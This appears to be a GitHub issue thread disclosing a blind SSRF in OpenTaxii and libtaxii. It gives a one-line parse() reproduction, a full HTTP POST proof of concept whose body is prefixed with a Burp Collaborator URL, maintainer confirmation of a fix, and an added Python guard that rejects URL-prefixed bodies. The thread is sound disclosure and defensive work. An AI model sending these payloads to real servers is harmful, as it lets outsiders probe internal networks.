Blind SSRF in OpenTaxii #176
Comments
@0wa1s thank you for this awesome find! I've reproduced the issue and narrowed it down to

from libtaxii.common import parse
parse("http://test-domain.local?junkdata")

will trigger a GET request to The call to I've made an issue for libtaxii project
A fix has been made available on version
Confirmative, fixed in Thank you all :)
Hi,
My colleague (Vijay Kota) and I were testing a locally deployed opentaxii instance and found that it is vulnerable to an SSRF issue, which can be exploited by adding http://<burp_collaborator>?
Sample POC:
POST /services/discovery HTTP/1.1
Host: 127.0.0.1:9000
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/xml
User-Agent: Cabby 0.1.20
X-TAXII-Accept: urn:taxii.mitre.org:message:xml:1.1
X-TAXII-Services: urn:taxii.mitre.org:services:1.1
X-TAXII-Content-Type: urn:taxii.mitre.org:message:xml:1.1
X-TAXII-Protocol: urn:taxii.mitre.org:protocol:https:1.0
Content-Type: application/xml
Content-Length: 339

http://ig2vjheeqdul2zwfbfxo31ngk7qxem.burpcollaborator.net?<taxii_11:Discovery_Request xmlns:taxii="http://taxii.mitre.org/messages/taxii_xml_binding-1" xmlns:taxii_11="http://taxii.mitre.org/messages/taxii_xml_binding-1.1" xmlns:tdq="http://taxii.mitre.org/query/taxii_default_query-1" message_id="877a5f67-6616-4040-bbc1-5f36efd5a349"/>
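
A server-side guard against the behaviour reproduced in this thread, added here as an example and not code from OpenTAXII or libtaxii. It assumes the root cause is a parser that treats a string argument as a location to fetch; the helper names, the placeholder host collaborator.example and the sample message_id are constructed.

```python
import xml.etree.ElementTree as ET

# Namespace of TAXII 1.1 messages, as used in the request on this page.
TAXII_11 = "http://taxii.mitre.org/messages/taxii_xml_binding-1.1"


class RejectedBody(ValueError):
    """The request body is not an inline XML document."""


def parse_inline_xml(body: bytes) -> ET.Element:
    """Parse a request body strictly as in-memory XML (hypothetical helper).

    The bytes are only ever given to fromstring(), which reads them as
    document content and has no filename/URL code path.
    """
    # Tolerate a UTF-8 BOM and leading whitespace, nothing else.
    stripped = body.lstrip(b"\xef\xbb\xbf \t\r\n")
    if not stripped.startswith(b"<"):
        raise RejectedBody("body does not start with an XML element")
    try:
        return ET.fromstring(stripped)
    except ET.ParseError as exc:
        raise RejectedBody(f"malformed XML: {exc}") from exc


def discovery_message_id(body: bytes) -> str:
    """Return message_id of a TAXII 1.1 Discovery_Request, else reject."""
    root = parse_inline_xml(body)
    if root.tag != f"{{{TAXII_11}}}Discovery_Request":
        raise RejectedBody(f"unexpected root element {root.tag!r}")
    message_id = root.get("message_id")
    if not message_id:
        raise RejectedBody("missing message_id")
    return message_id


# Constructed sample bodies (placeholder host and message_id).
XML = (b'<taxii_11:Discovery_Request xmlns:taxii_11="' + TAXII_11.encode()
       + b'" message_id="00000000-0000-4000-8000-000000000001"/>')
URL_PREFIXED = b"http://collaborator.example?" + XML

if __name__ == "__main__":
    print(discovery_message_id(XML))
    try:
        discovery_message_id(URL_PREFIXED)
    except RejectedBody as exc:
        print("rejected:", exc)
```

Running the guard before any TAXII message parsing means a URL-prefixed body is rejected by the service itself, whichever parsing library version is installed.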